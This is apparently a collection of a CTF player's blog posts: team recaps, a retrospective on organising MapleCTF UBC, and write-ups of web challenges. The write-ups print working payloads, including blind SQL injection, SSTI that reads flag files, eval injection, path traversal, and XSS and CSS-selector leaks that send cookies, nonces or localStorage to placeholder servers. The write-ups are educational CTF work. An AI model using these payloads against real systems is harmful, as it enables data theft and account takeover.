As a whole, I’m happy and grateful for the opportunity given to me and to MB to be a part of MMM. I’ve formulated solid friendships and met some really amazing people, and I can’t have imagined even a year ago that my CTF journey would make its way to Vegas. I have learnt alot from this year’s DEFCON, and I’m excited to see what next year will have in store for us.

Vie

Maple Bacon played in NahamCon CTF 2022 this past weekend, which came as a surprise - we were fully planning on focusing our efforts onto AngstromCTF which overlapped, however, NahamCon CTF proved to be interesting and good-quality so a last-minute decision was made to participate in both. AngstromCTF is still underway, but in the awkward passage of time between my last week and weekend, I played in NahamCon CTF for a little bit of practice.

Challenges

Flaskmetal Alchemist (Web)

Snoop around for a little bit and observe that the sqlalchemy libary version the app is using is 0.2, which is incredibly old. Google “sqlalchemy/0.2” specifically and you’ll recieve a few hits on a potential SQLi vulnerability in the group_by/order_by function. Luckily for us, the application indeed utilizes the order_by function.

            metals = Metal.query.filter(
                Metal.name.like("%{}%".format(search))
            ).order_by(text(order))

Simply create an ORDER BY-based blind SQLi that changes the order of the elements as a boolean condition.

search=Li&order=(CASE WHEN (SELECT HEX(SUBSTR(flag, 1, 1)) FROM flag)="66" THEN atomic_number ELSE name END)

Repeat this in a script and grab the flag character by character.

flag{order_By_blind}

Two For One (Web)

The challenge is a pastebin-esque site but with added otp functionality for basically everything - from viewing and deleting notes, to changing your password.

With no source provided, snoop around and observe a feedback form in the settings tab. Play around with it and observe that it is vulnerable to XSS, whatever is submitted in the feedback form is rendered to an “admin” user.

We need 2 things: the admin’s 2fa secret key and password. Start with the 2fa, since you need it for the password anyway.

In the settings page, observe a “reset 2fa” button which the server responds with an otpauth containing your username and a 2fa secret key.

otpauth://totp/Fort%20Knox:<USER>?secret=<BUNCHOFLETTERSANDNUMBERS>&issuer=Fort%20Knox

Use the XSS functionality in the feedback form to send the admin to that endpoint and observe the 2fa secret key value that is returned - you now have the admin’s 2fa (sidenote - it’s good to have a totp generator handy for this occassion).

The next step is to retrieve their password, which you can do by again using the feedback form to send the admin to make a POST request to the change_password endpoint. The request will need a valid 2fa value alongside the new password, which you should have from before. Once you succesfully reset the admin’s password, log into their account yourself and view their secret note.

Deafcon (Web)

The challenge asks for your name and email to be rendered onto a fake “deaf con” ticket as a PDF.

Observe that the ticket service has an alphanumeric whitelist on the name value, but does not have as strong of a restriction on the email value - only () chars are banned and the email must be RFC-compliant, which is easy to do by adding @any.thing at the end.

Script execution is possible, in a similar fashion to dangling markup. If you add an iframe or an img, the PDF will render it (albeit malformed). However, the service is also vulnerable to SSTI attacks, which can be tested by adding in a trivial payload such as {{7*7}} into the email field.

Craft an SSTI payload to find any file named flag.

Dweeno (Hardware/RF)

You’re given a few things: output.txt which is a list of binary values, a source.ino file, an image of an arduino hooked up to a breadboard with a chip in the middle, and a sketch of the arduino as well.

Observe the sketch and note that the chip in the breadboard is a quad XOR 2-gate, hooked up to the input and output pins of the arduino. Observe the source.ino file:

char * flag = "REDACTED";
String curr, first, second;
int in1=29, in2=27, in3=25, in4=23;
int out1=53, out2=51, out3=49, out4=47;
int i;

String get_output(String bits) {
    String output;
    digitalWrite(out1, ((bits[0] == '1')? HIGH : LOW));
    digitalWrite(out2, ((bits[1] == '1')? HIGH : LOW));
    digitalWrite(out3, ((bits[2] == '1')? HIGH : LOW));
    digitalWrite(out4, ((bits[3] == '1')? HIGH : LOW));
    delay(1000);
    output += String(digitalRead(in1));
    output += String(digitalRead(in2));
    output += String(digitalRead(in3));
    output += String(digitalRead(in4));
    return output;
}

//converts a given number into binary
String binary(int number) {
  String r;
  while(number!=0) {
    r = (number % 2 == 0 ? "0" : "1")+r; 
    number /= 2;
  }
  while ((int) r.length() < 8) {
    r = "0"+r;
  }
  return r;
}

void setup() {
  i = 0;
  pinMode(out1, OUTPUT);
  pinMode(out2, OUTPUT);
  pinMode(out3, OUTPUT);
  pinMode(out4, OUTPUT);
  pinMode(in1, INPUT);
  pinMode(in2, INPUT);
  pinMode(in3, INPUT);
  pinMode(in4, INPUT);
  Serial.begin(9600);
}

void loop() {
  if (i < strlen(flag)) {
    curr = binary(flag[i]);
    first = curr.substring(0,4);
    second = curr.substring(4,8);
    Serial.print(get_output(first));
    Serial.println(get_output(second));
    delay(1000);
    i++;
  }
}

Of note in the code is the loop() function and get_output() function. The loop() iterates through each character in the global flag variable, then splits it in half and feeds both halves to get_output().

The get_output function first calls to the arduino hardware and sets the 4 output pins to either a high voltage (HIGH) or low voltage (LOW) based on the value of a specific bit recieved in the input. Basically, it sets the output pins to either a 0 or 1 based on one of the bits in the input. After a short delay, the function then reads the value from the input pins, which, recalling the sketch of the arduino, would have been hooked up with the output pins to a quad XOR gate. THerefore, the input pins would return either a 0 or 1 depending on the XOR operation.

To summarize, the functionality of dweeno is to simply XOR the bits of the flag sequentially. We still need to figure out what the output pins are being XOR’ed with to get the value of the input pins - however, we know that the output.txt spits out the XOR’ed flag. We can move backwards by determining that the first binary value in the output.txt file is the XOR’ed character f. XOR’ing the binary value of f with the output.txt values will return to us the key used to XOR the output pins - this is revealed to be 01010101. Through reverse-engineering this small program, we can perform the necessary XOR operations to retrieve the flag with a simple script:

xor_boi = "01010101"
flag = ''

binary_flag = []

with open('output.txt', 'r') as fp:
	output = fp.readline()
	while output:
		curr = ''
		for i in range(0,8):
			y = int(output[i],2) ^ int(xor_boi[i],2)
			curr += str(y)
		ascii_char = chr(int(curr,2))
		flag += ascii_char
		output = fp.readline()


print(flag)

This year’s b01lers CTF was a great one for Maple Bacon, given that we came in first. A fantastic development, especially since last year we landed in 7th, so we’ve certainly improved a great deal since then.

While the balance of problems was skewed, the CTF was overall an enjoyable experience. It was nice to delve into the different problems outside of web (whilst waiting for the one (1) web challenge to release), which reminded me I really need to touch up on my reversing skills, a 2022 new year resolution that I wanted to get into. Thankfully the year’s not over yet, so I still have plenty of time.

Writeup

The rest of the article below is a copy of the writeup I did with Ming and Alueft over at ubcctf.github.io.

This writeup is a collaborative effort between Vie, Alueft and Ming.

TL;DR

Starved webgang swarms first web challenge within an hour of release.

Challenge Description

After the smash success of r/place, hackers have opened hacker/place for their own groups to duke it out on. However, some script kiddies managed to steal the secret key and place pixels much faster than all of us. It’s your job to hack the hackers and even the playing field.

Author: DJ

Difficulty: Medium

Solution

The challenge is inspired by reddit’s r/place, which gives us a canvas and the ability to place a pixel at a position every 10 seconds. The premise of the challenge has us looking at a bot that is busy occupying the middle of the canvas with a giant b01lers logo.

The source of the challenge is provided. In the app.js file, we can observe a /flag endpoint which requires the correct admin-valued JWT token in the cookie of the visitor to access, which gives us the flag. The secret which is used to sign the JWT is given as a header to the b01lers bot on the application.

The bot connects to the canvas server through a websocket, then colours the appropriate x,y coordinates on the canvas with “red” and “darkred” values to create the b01lers logo. If anyone tries to colour those x,y positions with another colour, the bot will swiftly change it back (this is important for later). When the bot receives a message signaling a colour change anywhere on the canvas (including when it adds a colour too), it will take note of the colour and make an axios POST request to that colour with the given x,y coordinates. The bot code will attempt to block any bad colour inputs through a trivial replace function:

let color = JSON.parse(str.slice(7));
try {
    color = color.replace('://', '')
} catch (err) {
    //
}
console.log(`Logging opposing pixel placed at ${x}, ${y} with color ${color}`);
axios(color, {
    method: 'post',
    data: { x, y }
})

This can be easily bypassed by simply adding another :// into your input, since only the first one in the string gets removed. This allows us to make the bot make a POST request to anywhere we want - which is nice, since any HTTP request will also include the custom header that has the JWT signing secret we need to make our own JWTs.

Going back to app.js, the canvas is updated using a 2d array of “clients” (read: people on the canvas adding pixels, including the bot). In the set_pixel() function, the 2nd try-catch block performs the logic needed to update the canvas to all clients on it with the newly-coloured pixel. In this try-catch, there is also logic which will validate the provided colour amongst the enumeration of colours available, so even if we did bypass the trivial :// replacer, we wouldn’t pass the if statement and our payload would not have been accessed by the bot… in theory. The application also keeps tabs on the client who last changed the updated pixel separately, and updates them with the change first before updating everyone else - and this occurs in the first try-catch block, before the if statement validates the provided colour.

Therefore, we can choose a pixel that’s watched by the bot, change it (using a valid colour), and let the bot change it back. Then, we can change the pixel back, but this time change the colour to a link to our server. The logic will thus send our payload to the bot first without verifying the colour. Of course, afterwards the colour check in the 2nd try-catch will fail us, and our payload will not be broadcast to the rest of the people on the canvas.

Once we’ve managed to make the app send our payload to the bot, we will get a request to our server with the header containing the secret needed to sign our own JWT tokens. Simply make your JWT “admin” token, access /flag, and receive your hard-earned goddamned-web-challenge flag.

For our very first, we wanted to keep it local. This made it very different from most other CTFs that one would be used to. We treated this as a beginner event - hoping to introduce the UBC community to the concept, well aware that we would have to cater to varying skill levels.

The CTF in general

The nature of the audience dictated a few design choices for the CTF as a whole:

Challenge difficulty

As mentioned earlier, the UBC version of MapleCTF was projected to be a beginner-friendly event. The main reasoning behind this was to make this CTF an entrypoint for UBC people hesitant to join based on percieved skill level. We (Maple Bacon) were hoping to convince people to get into cybersecurity more. We tried to make sure that our challenges all had some logical way of solving them, which didn’t take too much technical effort - googling was encouraged, and we hoped that people didn’t feel like they needed to know everything to succeed in this event.

At the same time, we still wanted to be creative and create unique challenges which were difficult compared to our accessible ones. While many challenges and ideas were cut, we managed to figure out unique ways to engineer different problems and vulnerable programs.

Teams

Because this was mainly an introductory event with a sprinkling of advanced problems, we needed a way to gently guide beginners into the event past completing all the accessible challenges. Our idea was the notion of “superteams” - 2 larger mega parties that a team of people would affiliate under, and which their points would be aggregated to the mega party’s point total. This would, hopefully, convince even newcomers to try and hack their way through as many problems as they can, and still feel as though they had made a dent on the event; seeing their points added to a super team’s total. We also figured this could allow teams within the same mega party to collaborate with each other and share tips and tricks. This was a success, we saw many teams under the same party give out general hints that helped newcomers learn something new, tackling other problems past what they felt comfortable with.

The mega-party idea will probably not carry over to the international version, since we aren’t as concerned with being beginner-friendly for it. However, should we run another UBC version, we’ll likely flesh this idea out further and see what other new things we can innovate with it.

Organization of the event

Scoring

Scoring was static and the reasoning for that was to not confuse newcomers on their first CTF. We lost alot of granularity with determining challenge difficulty (more on that later), but we figured that having static scores were easier for us to seperate which challenges were “beginner” and which weren’t.

There are limitations to this - the first one, as mentioned before, was the static scoring made quantifying challenge difficulty harder than it should be. I thought one of my challenges was really hard, until I saw that it had a high amount of solves, roughly equal to a few easy-intermediate challenges around. This skewed scoring - I had 2 challenges both worth 400 points, but one had 10 solves while the other had 2.

Another limitation was perception. Perhaps a challenge wasn’t actually as hard as it first comes off - but no one bothered with it since it was stacked at a specific point value. In my experience, I rarely look at point value anymore and concern myself with total amount of solves - but this is based on me trying out a few CTFs and learning that solve count is more accurate than point value (which is a plus for dynamic scoring). Newcomers will not have this same perception right away when looking at a challenge.

Discord

We used discord as the main point of communication between players and organizers. We set teams up with a private team channel so that they could freely discuss their answers among their teammates and @ one of the organizers in there without fear of leaking solutions. This was a bit of overhead for us to deal with as we found that we had hundreds of teams joining in (so hundreds of team channels to sift through), but the overall experience of the private team channels seemed to be satisfactory and we may consider refining the idea should MapleCTF UBC happen again.

Hints

Any challenge marked as “beginner” players were allowed to ask us for hints on. We had 2 specific groups of challenges: the ones you could ask for hints for, and the ones you couldn’t. Hint giving was allowed for this event, again due to the nature of this CTF, and we saw many people utilize it to their advantage. We set a hard boundary and refused to provide any hints for any challenges which didn’t possess the “beginner” tag.

Even though we did our best to provide accessible problems, we still knew people wouldn’t start the CTF on the exact same baseline. Hint giving was another solution to remedy that - we were open on gently guiding players to the solution for certain challenges. Obviously, we also didn’t want this mechanic to be abused to the point where we would walk people through the solution holding their hand, so we still exercised restraint in providing help.

I personally believe that the mechanic worked out - people did ask for help but they definitely solved challenges on their own. We simply saw the hints as a gentle nudge in the right direction for them.

Suffice it to say, we obviously won’t be upholding this hint giving policy for the international version.

The Business Side of Things

MapleCTF UBC had no chance of happening if it wasn’t for the company sponsors, Arista Networks and Teck Resources.

In order to synergize with the needs of the company, we offered our sponsors a chance to collaborate with us on releasing a challenge in MapleCTF which catered to the specific needs or tech stack of their company. We additionally gave the company representatives the ability to discuss themselves and answer any questions - we were able to treat the CTF as a networking event for potential candidates and the company sponsors, allowing both Arista and Teck more benefits from sponsoring us.

You just activated my Project Manager card

When it came down to brass tacks I decided to step to the plate to coordinate the event at a macro level. My expertise in web-based exploits basically guaranteed that I would also have a large role in creating the web problems, so doing that while also managing the event as a whole was such a task that I didn’t think I could complete.

Keep in mind I still had work and school to do alongside planning - observing all of these working parts come together in unison was rewarding, but it took an enormous amount of my attention. For the later months of 2021 I became busy with challenge design, company sponsor interfacing, and other administrative overhead I didn’t expect. Some things that I learned as an event manager:

You’ll get into the habit of chasing people around

Thankfully I have a very responsive team of capable people working alongside me on the CTF, so it wasn’t a huge issue to ask people every now and then to do specific tasks.

But I still had to chase a few people down and ask them to fulfill whatever role they had. Most small spats and issues were resolved quickly and without conflict, although there was still a bit of overhead that came from making sure people did what they were assigned.

Networking

We collaborated with a few executive members from the UBC CSSS, due to the fact that they had a considerable reach over the technical community in our campus. We also reached out to other clubs that we felt would be interested in this event - our ACM/ICPC competitive programming club, for example, is a very strong team with impressive backgrounds in math and algorithms (they’re also very well known in their respective discipline). We advertised with them and also reached out to nwHacks, Western Canada’s largest hackathon, for potential players there. Thankfully, UBC has a thriving technical scene and we took advantage of that for this event.

Ya like emails?

I essentially found myself being the main point of contact for many things regarding the event. I was interfacing with companies, checking in with the challenge authors for up-to-date information on the problems, and also reaching out to the infra team to visualize a timeline for when the services should be up and running. Being a very type A person made things a bit easier to manage as I had a system of time management and was able to incorporate these different tasks and front-facing meetings into my schedule seamlessly. But organization aside, I found that I soon became the person to talk to for anything MapleCTF-related: questions about the challenges, workshops, administrative discussions, company meetings, etc etc. Having these different roles meant I was never truly “off” for MapleCTF: constantly working on and making sure all systems were ok in every department.

Scope creep

This was our first CTF so I was expecting some of our more novel ideas to fall short come the time of the event. At least from my end, plenty of challenge ideas that I had were scrapped for numerous reasons (I didn’t have enough time, the exploit seemed infeasible for the difficulty scope of the event, I just didn’t like the challenge lol, etc etc). There were also several ideas or concepts that we incroporated into the event that were simplified for the sake of KISS. We really did alot for our first CTF, and none of us wanted more work on top of our already stacked schedules.

Infrastructure

Our infrastructure utilized AWS, kubernetes, github actions, CTFd and grafana.

No I don’t know what k8s is and at this point I’m too scared to ask

Utilizing k8s made continuous container deployment easy. The additional k8s kops tool when combined with our AWS infrastructure simplified alot of stuff for us - making challenge deployment quick and easy and also giving us the opportunity to quickly roll out patches or restart deployment in seconds. Our infra guy created a highly scalable solution which could be added to if needed. Thankfully, not too many spats happened throughout the competition so we didn’t have to worry too much about the whole thing going down.

AWS EC2, very cool

We used mid-size AWS EC2 vms in order to host our challenges. We had a running total of 56 challenges, with about 40 of them requiring containerizing on our infra. Thankfully, we had no issues with dockerizing our challenges and it was the easiest container service to get into.

Our vms were split up by category: rev/pwn, web, crypto. We decided to categorize the vms this way since it made the most sense to us, and allowed us to scale the vms depending on the needs of the category. Web, for example, were simplistic in nature and didn’t really need a hefty amount of compute for. This could change come the international version, but overall we allowed ourselves to be generous in this category but found that we didn’t necessarily need to be.

Challenge design

Short writeups/solutions to my web problems can be found here.

Web Bacon

It was a bit hard to create a series of ramp-up challenges for web since the sorts of things you can do in this field were broad. I decided to at least create a few challenges which would logically follow after one another based on a specific exploit: XSS, and that seemed to be succesful. The largest issue I had with my challenges was a matter of understanding if certain challenges were actually easy or not - a specific problem that I envisioned, “Poem Me”, had far fewer solves than anticipated. While I had people test the challenges out before they made it into production, there was still an inherent bias that the QA had because they at least had seen a couple CTFs beforehand. They had a frame of reference - but how did my challenge look to those without one?

I made alot of design choices to try and simplify the web problems to a level where I felt people could hack at them, have fun, and gain something out of the experience. I knew that engineering difficulty was already a complex thing to do, and doing something like forcing a player to guess what the vulnerability was for a challenge was definitely not my intended strategy. In fact, I had hoped that guesswork would be kept to a minimum when it came to challenge-making.

I truly believe that in the real world, there is an amount of intuition and inference that you would need to make which may or may not completely follow from the trains of thought that a CTF would lead you down - in some cases, I feel it’s inevitable. However, I didn’t want to really teach people how to guess - I wanted to teach people how to correctly audit a security bug and showcase their skills in exploiting it. I felt as though that there were 2 different lessons one could teach and I wasn’t all that concerned with teaching the former.

In some cases, I tried to make things obvious or nudge players towards the solution through certain things (comments in code, using really old versions of libraries, etc etc). However, I felt as though some of my mid-level challenges were not truly intermediate in percieved difficulty.

Valentina, for example, could be solved by looking at the library version of one of its packages, and formulating an exploit from there. But this was a novel approach for some, accounting for the low solves in the challenge.

Will this be an issue for the international version? I’m not sure. I will have more freedom to exercise my creativity over the types of challenges I’ll make - which could mean more difficult challenges, but perhaps the main issue with difficulty just came down to the scoring. Due to how we made scoring static as to simplify the meta of the CTF for newcomers, it meant I had to just hope that my guess at the score value was equally matched with the subjective difficulty of the challenge I made. I imagine that with dynamic scoring, much of the granularity involved with challenge difficulty will sort itself out.

Misc Bacon

I created 3 jail challenges based on Python. Lesson here? Jails are hard to make - in the sense that the number of unintended solutions that could come up is astounding. The jails were the challenges that had multiple flavours of solutions to them, contributing to a higher than normal solve count, and skewing the score values. Pyjail 2, for example, was worth the same amount of points as Valentina 1, but Valentina had about 30% of the solve numbers in Pyjail 2.

Admittedly I was somewhat expecting a few unintended solutions but my mistake was in assuming that not many people would get creative - many people did, in fact, get very creative and found a bunch of different ways to bypass the blacklists in my jail problems. I’m not upset at any one of them - in fact, the novel solutions I saw some people come up with were truly unique and incredible. This was, however, a point against me as I wasn’t fully expecting the different solutions.

A few people did mention to me that they liked the pyjail problems, so I think next time I do a jail problem I’ll score it lower (or dynamically).

Lessons Learned

While I still believe that the justification for a static scoring system was valid, I also believe that dynamic scoring is far easier to deal with and helps to avoid situations where I overestimate and underestimate the difficulty of my challenges - both situations which happened in MapleCTF. While I managed to avoid the misjudgement for all my challenges (only 1 seemed to be easier than I thought, and a different 1 seemed harder than I thought), I’d like to avoid any situations where the scores could be skewed based on point values of challenges completed. For that, I believe that dynamic scoring would be the way to go to remedy this.

Additionally, it helps to be more generous in the distribution of tasks. Early on I had adopted much of the responsibilities myself and while I won’t deny the small part of me that likes the thrill of completing every task on her own, I also won’t deny the tremendous overhead I experienced when I decided to put more on my plate than I could finish.

Stats

Our score distribution was pretty much skewed to the left, as we somewhat expected:

Most people solved a few of the beginner challenges and decided to stop there.

When it came to the individual challenges:

Our beginner challenges all had solve counts close together - our harder challenges only had 1-3 solves.

Wrapping it up

MapleCTF UBC was a huge undertaking that I definitely couldn’t have done without my team. It was a massively rewarding event which helped developed my own skills as both a CTF player and software engineer, and I hope to utilize these skills with the lessons learned to create a great international version that all can hack away and enjoy.

TL;DR

CSS attribute selectors for a stylesheet leak of the CSP nonce combined with XSS.

Recon

The CSP is implemented via a meta-tag in the DOM, and not through response header as is usually the common practise. It’s just one directive, script-src, with the randomly generated nonce value, which we can try to retrieve.

<meta http-equiv="Content-Security-Policy" content="script-src 'nonce-$NONCE$'">

(Note: it is also possible to extract this nonce from the script tag on the same page)

The cookie is set to the localhost domain - which is important moving forward with our exploit (we won’t be injecting our payloads on the lovelynonce domain, it’ll be on localhost).

await page.setCookie({
			name: 'flag',
			value: process.env.FLAG || "flag{fake-flag}",
			domain: "localhost",
			expires: now() + 1000
		})

On the HTML of the page is a location.hash navigator that sets an element in the HTML to the value of whatever document.location.hash was.

    <script nonce="$NONCE$">
    	document.location.hash = "";
    	window.onhashchange = ()=>{
    		if(document.location.hash) {
          		desc.innerHTML = decodeURIComponent(document.location.hash.slice(1));
				document.location.hash = "";
        	}
    	};
    </script>

Test this out by appending #%3Cp%3Etest%3C%2Fp%3E (just the URLencoded version of #<p>test</p>) to the challenge webpage and see how this code snippet works. This is an easy XSS vector, but obviously the CSP isn’t letting us do something so trivial as #<script>alert(1337)</script>.

There’s a report function that actually utilizes this browser-side JS to add a report form in the webpage.

Exploit in Detail

The location hash is a potential XSS vector. You can copy-paste the webpage’s nonce value into an iframe with the srcdoc attribute and achieve XSS.

<iframe srcdoc="<script nonce=[THEIR_NONCE]>alert(1)</script>"></iframe>

This works because iframes loaded with srcdoc aren’t cross-origin. BUT, this also won’t work for the challenge as the server generates unique nonces for each request, meaning that our nonce won’t be the same nonce that the admin has when they load up our webpage with our iframe payload. The CSP is technically doing it’s job, and even with the copy-pasted nonce and srcdoc iframe, this is just a self-XSS for now. Ideally, we want to find out the nonce of the webpage when the admin visits - and while they’re still on the webpage, load up our iframe payload with the correct nonce.

Nonces implemented via the meta-tag, or nonces within the script-tag can be leaked through CSS attribute selectors. Setting the hash to:

<style>*{display:block}meta[content^="script-src nonce-a"]{background-image:url("http://our-server/result?nonce=a");}</style>

or

<style>script[nonce^="a"]{display:block;background:url("http://our-server/result?nonce=a");}</style>

will send a request to our server in the event that any element with the right attribute stuck to it has a value starting with script-src nonce-a. We can extrapolate this further to brute-force each character in the attribute value and use fetches to our server to extract the correct ’next character’ of the nonce.

If the CSS attribute selector successfully finds a tag that matches the above conditions, then a request is fired to our server. Otherwise, no request is made to our server.

To change the hash, we have the admin open a window to the vulnerable page (localhost:8000), identified by a name ( open("http://localhost:8000/", "thisOneWindow")), and after that, we can have the admin open a window with the same url, but with a different hash, and the same name ( open("http://localhost:8000/#aaaaa", "thisOneWindow")). The browser has this page cached, and as a result, we will still be using the same page, just with a different location hash.

The Exploit Flow

The attack flow is as follows:

1. Admin visits our server, hosting an index.html that will load the challenge page.

2. Iterating through the alphanumeric charset, the injected style tag in the hash tests for each char if it is in the nonce - and if so, sends a request back to our server.

3. That request is processed by our Node backend, which pushes the correctly guessed character into an internal array.

4. The JS in index.html (the browser JS) sets a short timeout and then tries to retrieve the value in that internal array from the backend, updating the nonce value guessed so far and testing the next char in line.

5. This process repeats from step 2 until the entire nonce is leaked.

6. With the full nonce, we set the iframe payload with the correct, complete nonce value that dumps cookies back to our server.

7. Flag! ASIS{nonces_disappointed_me_df393b}

Relevant Sources

• Bypass CSP nonces with DOM XSS
  • Explains how to use CSS attribute selectors to get nonce.
• Window Opener and XSS Vectors
  • Explains how to exploit location.hash.
• Robert's brain
  • Found a way to inject a script tag that executes immediately even after the page has loaded.

Source was the same from MAAS 1 (and will be the same for MAAS 3). MAAS 2 involved the ’notes’ part of MAAS, where you are prompted to register a user and afterwards add key:val attributes to yourself, give yourself a bio, or transfer key:value attributes to another user.

The provided source has some interesting code:

notes/app.py

@app.route('/useraction', methods=["POST"])
def useraction():
    mode = request.form.get("mode")
    username = request.form.get("username")
    if mode == "register":
        r = requests.get('http://redis_userdata:5000/adduser')
        port = int(r.text)
        red = redis.Redis(host="redis_users")
        red.set(username, port)
        return ""
    elif mode == "adddata":
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        requests.post(f"http://redis_userdata:5000/putuser/{port}", json={
            request.form.get("key"): request.form.get("value")
        })
        return ""
    elif mode == "getdata":
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        r = requests.get(f"http://redis_userdata:5000/getuser/{port}")
        return jsonify(r.json())
    elif mode == "bioadd":
        bio = request.form.get("bio")
        bio.replace(".", "").replace("_", "").\
            replace("{", "").replace("}", "").\
            replace("(", "").replace(")", "").\
            replace("|", "")

        bio = re.sub(r'\[\[([^\[\]]+)\]\]', r'{{data["\g<1>"]}}', bio)
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        requests.post(f"http://redis_userdata:5000/bio/{port}", json={
            "bio": bio
        })
        return ""
    elif mode == "bioget":
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        r = requests.get(f"http://redis_userdata:5000/bio/{port}")
        return r.text
    elif mode == "keytransfer":
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        red2 = redis.Redis(host="redis_userdata",
                           port=int(port))
        red2.migrate(request.form.get("host"),
                     request.form.get("port"),
                     [request.form.get("key")],
                     0, 1000,
                     copy=True, replace=True)
        return ""

@app.route("/render", methods=["POST"])
def render_bio():
    data = request.json.get('data')
    if data is None:
        data = {}
    return render_template_string(request.json.get('bio'), data=data)

The relevant parts are when mode is equal to bioadd. There’s a pretty hefty sanitizer in play that removes all relevant characters required for an SSTI. This is further supplemented by the endpoint to /render, which takes your input and passes it into render_template_string. TL;DR: Server-Side Template Injection involves injecting code into template expressions that are evaluated on the server. Essentially, if you have an app vulnerable to SSTI, then you should be able to inject any expression into {{double curly brackets}} and that expression would be evaluated.

But, this is a sanitizer function, and it does specifically remove the {} characters, so we would be out of luck for SSTI. Out of sanity, I double checked that {{template expressions}} were disallowed and tried a basic SSTI payload such as {{7*7}}.

Oh, wait a second. The sanitization filter isn’t actually applied to our input! We get a quick and easy SSTI vulnerability.

We can modify our payload from the previous MAAS 1 to better suit a template expression:

{{request.application.__globals__.__builtins__.open('../flag.txt','r').read(-1)}}

Update your bio as this and the flag will be loaded for you!

While this is the unintended solution, the intended one did involve throwing an SSTI payload over “behind” the filtering by manipulating the redis container that would contain the user objects.

If the filter was actually applied, you would be forced to instead leverage the application’s key transfer feature to force a key-transfer connection to a Redis container at port 6379 - which is the defualt port of the Redis server.

The code for the keytransfer actually calls the Redis command “migrate”:

    elif mode == "keytransfer":
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        red2 = redis.Redis(host="redis_userdata",
                           port=int(port))
        red2.migrate(request.form.get("host"),
                     request.form.get("port"),
                     [request.form.get("key")],
                     0, 1000,
                     copy=True, replace=True)
        return ""

And we can provide as a port argument the value 6379 to tell the Redis-cli server that the provided “host” argument should have their value changed to the “key” argument. Here, you would then be able to set a user’s port as some arbitrary value that you can control, such as “../bio”. Get 2 users, perform a key transfer to the Redis-server to change one user’s port to “../bio”, and then perform another key transfer to give a “key” called “bio” with the value being your SSTI payload, to the original user. The result after all these Redis manipulations should be the execution of your SSTI payload that would have completely avoided the filtering.

You could, additionally, use your previous payload from MAAS 1 and take advantage of the challenge’s improper network isolation issues to make internal calls to the MAAS 2 notes API. This was possible due to the fact that MAAS 1-3 were 3 different, linked docker containers that (unintended by the dev) could be interacted with from between docker containers. This “sharing” feature allowed you to reuse an attack vector in one challenge to request for resources from another challenge, like their flag. This could be done for any of the MAAS challenges. Interesting stuff!

RaRCTF was a good CTF, and given how it appears to be team WinRaR’s first CTF, I’m thoroughly impressed by the quality of the challenges.

Vie

A simple xss challenge with the slightest of twists: instead of stealing admin cookies, you’re stealing admin’s localstorage values. This was possible because the admin, which was a puppetteer chrome browser, was operating in no-sandbox mode.

Insert as your payload:

title: eh
link: javascript:fetch('your.server?fleg='%2B(window.localStorage.getItem("flag")));

And report to admin. Careful with the wait times…

NOTE: I first-blooded this challenge before certain measures were implemented. There were some issues with FBG throughout the competition that involved the organizers making amendments and introducing a pow to help with the stability of the infrastructure. I’m not aware of how the solution would have looked with the accompanying pow, unfortunately.

flag: rarctf{th0s3_f4ncy_butt0n5_w3r3_t00_cl1ck4bl3_f0r_u5_a4667cb69f}

Secure Uploader

In the provided source, observe this piece of code:

@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))
    res = cur.fetchone()
    if res is None:
        return "File not found", 404
    with open(os.path.join("uploads/", res[0]), "r") as f:
        return (os.path.join("uploads/", res[0]))

python’s os.path.join is a unique thing: its purpose is to concat the provided parameters, appending one after the other with a / character in between. As an example, os.path.join('foo','bar') would produce foo/bar. However, specify an absolute filepath as a parameter, and everything before that string will be erased. So, os.path.join('foo', '/bar') would produce just /bar. We can use this knowledge to provide to the challenge a filename such as //flag which will resolve to retrieve the flag kept in the root directory of the docker container hosting the challenge.

flag: rarctf{4lw4y5_r34d_th3_d0c5_pr0p3rly!-71ed16}

MAAS 1 // Calculator

The first part of “Microservices as a Service” was a challenge that involved improper use of the python function eval(). For those unaware, eval() takes as a parameter a string representing code. For example, eval('print("hello")') would return hello in your console. Obviously, not a very safe function to use.

In the provided source, we see some very interesting code in arithmetic/app.py:

@app.route('/arithmetic', methods=["POST"])
def arithmetic():
    if request.form.get('add'):
        r = requests.get(f'http://arithmetic:3000/add?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('sub'):
        r = requests.get(f'http://arithmetic:3000/sub?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('div'):
        r = requests.get(f'http://arithmetic:3000/div?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('mul'):
        r = requests.get(f'http://arithmetic:3000/mul?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    result = r.json()
    print(result)
    res = result.get('result')
    if not res:
        return str(result.get('error'))
    try:
        res_type = type(eval(res))
        if res_type is int or res_type is float:
            return str(res)
        else:
            return "Result is not a number"
    except NameError:
        return "Result is invalid"

This would run when you perform any arithmetic action using the calculator in the website. When using the calculator, if you try to do an addition formula like “1+1”, the returned result isn’t 2, but “11”. Why is that?

The program passes your code into eval() (in the try statement), but the result of that eval() isn’t returned anywhere. If the eval’d result was an integer, then the string that was passed as a parameter to eval() would be returned, hence why “11” is returned as the result of “1+1”. However, eval() is called nonetheless, and we can use this to our advantage.

First and foremost, if the result of the eval was a number (int or float), then the string is returned. Else, “Result is not a number” or “Result is invalid” is returned. We could use this as a boolean condition with the following string:

eval("1 if (open('../flag.txt','r').read(-1).startswith('rarctf{')) else 'false'")

We can instead put this as our “arithmetic” equation. Since the POST request made to the endpoint requires 2 params to be operated on, “n1” and “n2”, split this statement into 2 arbitrary halves and put 1 half into the “n1” param, and the other into the “n2” param.

What this does is it calls eval() once more, but in this 2nd call we have more freedom to stipulate what can be evaluated. The param to the inner eval() is just an if statement that returns the integer 1 if (open('../flag.txt','r').read(-1).startswith('rarctf{')) returns the boolean value true, or returns the string 'false' if the statement returns the boolean value false.

